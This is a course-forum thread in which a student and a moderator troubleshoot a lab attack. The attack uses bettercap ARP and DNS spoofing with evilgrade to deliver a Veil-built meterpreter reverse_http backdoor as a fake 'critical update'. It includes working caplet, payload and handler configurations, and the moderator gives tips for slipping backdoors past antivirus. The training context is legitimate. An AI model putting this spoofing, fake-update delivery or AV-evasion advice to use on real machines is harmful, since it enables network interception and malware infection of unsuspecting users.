- This topic has 15 replies, 2 voices, and was last updated 4 years, 5 months ago by Diego Pérez.
- AuthorPosts
- July 24, 2020 at 10:07 am #42939TerrensuParticipant
Hey,
Sorry to bother you, however when i was working on the content displayed in lecture 16.8, everything was fine until the last part, where Mr zaid downloads the installer from DAP, i tried to do that on my windows machine, got a message of ‘400 bad connection’ when i tried to access the website, however other websites did work. I tried to install the dap installer on another website, which worked however when i opened it, no meterpreter session was created. How can i fix this?
thanks.
July 24, 2020 at 10:12 am #42940TerrensuParticipantAlso, i when i try to access other websites an error of HTTPerror(‘invalid http request form’ expected absolute, got relative) would occur
July 24, 2020 at 10:32 am #42941TerrensuParticipantSimilar problem also occured in 16.7 everything worked fine until i clicked ‘update now’ in DAP client, where it would display an error of ‘Discovered an error in the component list’ and stopped me going any further. Please help
July 26, 2020 at 3:49 am #43043Diego PérezModeratorHi!
Did your backdoor work if you run it by it’s own?
Can you show me the following please:
1. Result of ifconfig in Kali.
2. The result of ipconfig in Windows.
3. The configuration for evilgrade.
4. The result of show options before running the multi handler.
5. Bettercap’s version and command used to start it.
6. The contents of arp spoof caplet.
7. The result of: get dns.spoof.*Let me know.
DiegoJuly 26, 2020 at 5:28 am #43050TerrensuParticipantHey diego:
Thanks for replying below is the information youre seeking for!
IFCONFIGeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe59:fbfa prefixlen 64 scopeid 0x20<link>
ether 08:00:27:59:fb:fa txqueuelen 1000 (Ethernet)
RX packets 6 bytes 900 (900.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 27 bytes 2314 (2.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 24 bytes 1356 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24 bytes 1356 (1.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Configuration for evilgrade:
Payload: go/meterpreter/rev_http selectedRequired Options:
Name Value Description
—- —– ———–
BADMACS FALSE Check for VM based MAC addresses
CLICKTRACK X Require X number of clicks before execution
COMPILE_TO_EXE Y Compile to an executable
CURSORCHECK FALSE Check for mouse movements
DISKSIZE X Check for a minimum number of gigs for hard disk
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual or Heap
LHOST 10.0.2.15 IP of the Metasploit handler
LPORT 8080 Port of the Metasploit handler
MINPROCS X Minimum number of running processes
PROCCHECK FALSE Check for active VM processes
PROCESSORS 1 Optional: Minimum number of processors
RAMCHECK FALSE Check for at least 3 gigs of RAM
SLEEP 5 Optional: Sleep “Y” seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Prompt user prior to injection
UTCCHECK FALSE Check if system uses UTC timeThe result of show options in msfconsole:
Module options (exploit/multi/handler):Name Current Setting Required Description
—- ————— ——– ———–Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST 10.0.2.15 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP PathExploit target:
Id Name
— —-
0 Wildcard Target
bettercap’s version and command used to start it:
root@kali:~# bettercap -iface eth0 -caplet /root/spoof.cap
bettercap v2.23 (built for linux amd64 with go1.11.6) [type ‘help’ for a list of commands][00:26:15] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
[00:26:15] [endpoint.new] endpoint 10.0.2.3 detected as 08:00:27:b5:47:34 (PCS Computer Systems GmbH).
[00:26:15] [sys.log] [inf] arp.spoof enabling forwarding
[00:26:15] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
[00:26:15] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.The contents of the arp spoof caplet.
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.7
arp.spoof on
set net.sniff.local true
net.sniff onIm a bit confused on how to get dns.spoof?
July 26, 2020 at 5:33 am #43051TerrensuParticipantThe ip address of the windows machine is 10.0.2.7 and the mac address of the router (10.0.2.1) did change after i ran the bettercap command, the mac address turned to the same address as the linux machine
July 26, 2020 at 5:38 am #43052TerrensuParticipantand here is the evilgrade configuration:
Name = Download Accelerator
Version = 1.0
Author = [“Francisco Amato < famato +[AT]+ infobytesec.com>”]
Description = “”
VirtualHost = “(update.speedbit.com)”.———————————————————————————————————-.
| Name | Default | Description |
+————-+————————————————-+——————————————+
| title | Critical update | Title name display in the update |
| failsite | http://www.speedbit.com/finishupdate.asp?noupdate=&R=0 | Website display when did’t finish update |
| enable | 1 | Status |
| agent | /var/lib/veil/output/compiled/Pay.exe | Agent to inject |
| endsite | speedbit.com | Website display when finish update |
| description | This critical update fix internal vulnerability | Description display in the update |
‘————-+————————————————-+——————————————‘July 26, 2020 at 5:53 am #43053TerrensuParticipantafter running everything again, the dap software on my windows pc was able to detect the update, however when i ran it, no session was created in msfconsole.
July 26, 2020 at 6:14 am #43054TerrensuParticipantHTTPSError(‘Invalid HTTPS request form ( expected: absolute, got: relatvie);
was the error shown when i tried to acces speedbit.com like Mr Zaid did in lecture 16.8, everything went back to normal once i closed the services in the kali machine
July 27, 2020 at 3:51 am #43108Diego PérezModeratorHi!
Did the backdoor work if you run it by it’s own?Can you share the result of get dns.spoof.* ?
Let me know.
DiegoJuly 27, 2020 at 5:30 am #43119TerrensuParticipantHey,
How do I deliver the back-door to my windows machine and what how do I get the result of dns.spoof is it just the lines of code after I run bettercap?
Sorry to bother you.
July 27, 2020 at 10:36 am #43134TerrensuParticipantHey diego,
i was able to send my backdoor to my windows machine and a meterpreter session was created on my linux machine, although I found out that windows didnt allow me to download the backdoor, so I had to manually switch off windows defender, which in obvious cases, isn’t gonna happen in a real life scenario, any suggestions on how i can fix it? Furthermore, im still a bit confused on how to get the results of dns spoof?
Sorry for bothering.
July 28, 2020 at 3:43 am #43176Diego PérezModeratorHi!
For the results of dns.spoof module just run the command in bettercap terminal when tou have done all your settings:get dns.spoof.*
Also keep defender disabled. To bypass it:
Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable ……..
So the main thing is to make sure that Veil or any other tool you’re using to generate the backdoor is up to date.
Here’s a few solutions to try if your backdoor is getting detected:
1. Make sure that you have the latest version of Veil, so do updated before doing use 1.
2. Experiment with different payloads, and experiment with different payload options and you should be able to bypass it.
3. Try generating a backdoor using the fat rat, empire (tutorial link for empire in the resources of lecture 68).
4. Modify backdoor code if its in bat (covered in my social engineering course.
5. Modify backdoor using a hex editor (covered in my social engineering course).
6. Create your own backdoor (covered in my python course).
The best thing to do is look at the last lecture of the course (bonus lecture) it contains all the courses that you can take with this course and a comparison between them.Also check out this video:
Hope it helps!
DiegoJuly 29, 2020 at 8:07 am #43240TerrensuParticipantHey diego,
When i enter the command get dns.spoof in kali, it returns with an error saying sys.log [err] dns.spoof not found, how can i fix this?
thanks
July 29, 2020 at 8:19 am #43241TerrensuParticipantHey diego,
Is it this thing?
dns.spoof.address: ‘<interface address>’
dns.spoof.all: ‘true’
dns.spoof.domains: ‘update.speedbit.com’
dns.spoof.hosts: ”regards,
- AuthorPosts
- You must be logged in to reply to this topic.